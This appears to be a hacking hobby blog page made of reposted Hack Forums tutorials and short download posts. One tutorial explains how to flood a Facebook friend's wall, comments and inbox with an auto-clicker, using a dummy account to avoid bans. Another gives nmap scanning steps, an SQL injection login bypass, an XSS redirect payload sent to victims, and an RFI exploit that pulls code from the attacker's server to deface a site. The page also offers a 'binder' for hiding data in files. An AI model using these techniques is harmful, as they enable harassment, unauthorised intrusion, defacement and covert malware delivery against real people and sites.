Facebook Wallpost, Comment, Message Flooding

Hi guys. I want to show you my tutorial on how to Flood Wallposts, Comments and Message in Facebook. 

Disclaimer:

1) In this method, you need to add your slave as a friend or else you will not be able to Post on his wall, Comment and Message him.
2) By doing this method, Facebook can block you from posting comments and wallposts, so I suggest use a dummy account or use this with care and limitation. :D

THINGS WE NEED:

1) A Facebook Account and a slave (of course) 
2) Auto-Clicker (In this tutorial we will use Auto Clicker v2.2 by Shocker)
Download: You can download it at the Official Site

Virus Scan Report: (Click to View)

NOTE: Detections are false positives. If you don't trust me you can run it sandboxed.

Picture (Click to View)

3) The most important is BRAIN and COMMON SENSE 

INSTRUCTIONS:

1) Login to your Facebook account. Then after logging in, open another tab/window then go to "m.facebook.com" (without quotes)

Picture (Click to View)

2) Go to friends, then type your slave's name then click Search. Now go to your slave's profile. 

Picture (Click to View)

3) Now for the third step, I will cut this into 3 parts, Wallpost Flood, Comment Flood and Messaging Flood.

-Wallpost Flood-
1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is exept the "Number of Clicks".

Picture (Click to View)

2) Put your comment on the textbox. Then press F2. NOTE: Don't put your cursor on the "Post" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.*see picture.

Wall Post Picture

Auto Clicker Countdown

3) Now after you saw the progress of click at the taskbar (see picture) place your cursor on the "Post" button.
4) Now leave your cursor on the "Post" button while the Auto-Clicker runs. Leave it for atleast a minute. 
5) Finished. You've just flooded his Wall. 

-Comment Flood-
NOTE: In this tutorial we will Comment Flood a profile picture. But you can also use Comment Flooding in Wallposts and other posts/pics/vids that can be commented on. Just use your common sense on how to do it. 
1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is exept the "Number of Clicks".

AutoClicker Picture

2) Click your slave's profile picture.

Profile Picture

3) Pick a photo you want to comment on. (You can use Next and Previous Button to Navigate to his other Profile Pics.)
4) Put your comment on the textbox. Then press F2. NOTE: Don't put your cursor on the "Comment" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.*see picture.

Comment Picture

AutoClicker Picture

5) Now after you saw the progress of click at the taskbar (see picture) place your cursor on the "Comment" button.
6) Now leave your cursor on the "Comment" button while the Auto-Clicker runs. Leave it for atleast a minute. 
7) Finished. You've just comment flooded a profile picture of your slave :))

-Message Flood-
1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is exept the "Number of Clicks".

AutoClicker Picture

2) Click "Messages" beside his profile picture.

Message Picture

3) Put anything in the "Subject" and "Body Message".

Message Picture

4) Then press F2. NOTE: Don't put your cursor on the "Send" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.*see picture.

WallPost Picture

AutoClicker Picture

5) Now after you saw the progress of click at the taskbar (see picture) place your cursor on the "Send" button.
6) Now leave your cursor on the "Send" button while the Auto-Clicker runs. Leave it for atleast a minute. 
7) Finished! You've just flooded an Inbox of your slave.

FINISHED

If you noticed, they are all the same concept on how to flood. I've just cut it into 3 parts to make your life easier If you're planning to use a specific flood. Hope you liked my tutorial. Thank you for reading! 



This is a Tutorial From Think (Hack Forums).
Copyrights HF.

The Absolute Basics of Hacking

Intro
Hello and welcome to this tutorial. If you see all the text on this page, and are afraid, you're not meant to be a hacker, quit now. Also, please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers; I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. And if you don't know what a word means, Google or Wiki it!; if you don't understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.

Recommended Tools
Port Scanner - nmap - http://nmap.org/
Browser - FireFox - http://firefox.com/

Daemon Vulnerabilities
Description
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses.

Scanning For Vulnerabilites
Well, this is where a little common sense comes in, because we need to answer one question: Which ports to scan? Well, with a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time do we? Well nmap has us covered there, so just scan multiple ports by seperating each target port with a comma (,) like so: "nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV". This will scan all ports between 1 and 1000.

Checking For Vulnerability
After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.

Using the Exploits
This varies, depending on the language that the exploit is coded in; google on how to do this, since it would just be wasting my time how to use all of the different languages here.

Common Web-Script Vulnerabilities
Description
In this section, I will be writing about vulnerabilities in a webserver's server-sided code. Here are the topics I will be covering:

• SQL Injection
• XSS (Cross-Site Scripting)
• RFI/LFI (Remote/Local File Include)

SQL Injection
Description
SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.

Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code

PHP Code:

<?php
$user = $_POST['u'];$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
    echo("<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}?>

Basically what this code does, is take the username and password input, and takes the users's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.

The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail.

XSS (Cross-Site Scripting)
Description
This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)

Example Vulnerable Code - search.php (PHP)

PHP Code:

<?php
$s = $_GET['search'];// a real search engine would do some database stuff hereecho("You searched for $s. There were no results found");?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the slave to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=<script>window.location='http://goatse.cz/'</script>". This will output "You searched for <script>window.location='http://goatse.cz/'</script>. There were no results found" (HTML) and assuming the target's browser supports JS (JavaScript) which all modern browsers do unless the setting is turned off, it will redirect them to goatse.

RFI/LFI (Remote/Local File Include)
Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.

Example Vulnerable Code - index.php (PHP)

PHP Code:

<?php
$page = $_GET['p'];
if (isset($page)) {
    include($page);
} else {
    include("home.php");
}?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.

Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server

PHP Code:

<?php
unlink("index.php");system("echo Hacked > index.php");?>

and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.






This Tutorial is a work by  InfamousBytes from Hackforums .
Thanks to HF.
The Link to original post is here.

Heya alll!! I would love to post about some basic software which can be used by Starters in hacking!! :) This is a binder!! which is used to bind a secret into another file which can be used to pass information stored in other computers! This is from Alboraaq Team!!

You can download the binder from here.

Guys and Gals... a lil coool stuff for you all!! This file contains a collection of Linkin Park(LP) songzz!! These  songs Rock onn!! :) So Have Fun listening to It!! :) Download Here.

Hi Guys and Gals.... This is for people who have interest in Hacking stuffs... This book gives the basic idea and knowledge of hacking! So those who want to learn Hacking and stuffs... I request you all to read this so as to get the proper basics of it!!

You can download this PDF file from Here.

Welcome To my Blog Guys And Gals. In this blog you will get to know more about computers, cyber world, Hacking, Spoofing, Softwares, Hardwares etc... In Short you will Explore the World Of Computing. Your Comments are welcomed. You can use this blog to share your knowledge with others. And also you can clarify your doubts about computers, cyber world etc. Users are requested to use the information given in this blog in a Useful manner and not to use it against the Cyber Laws (Indian Govt.).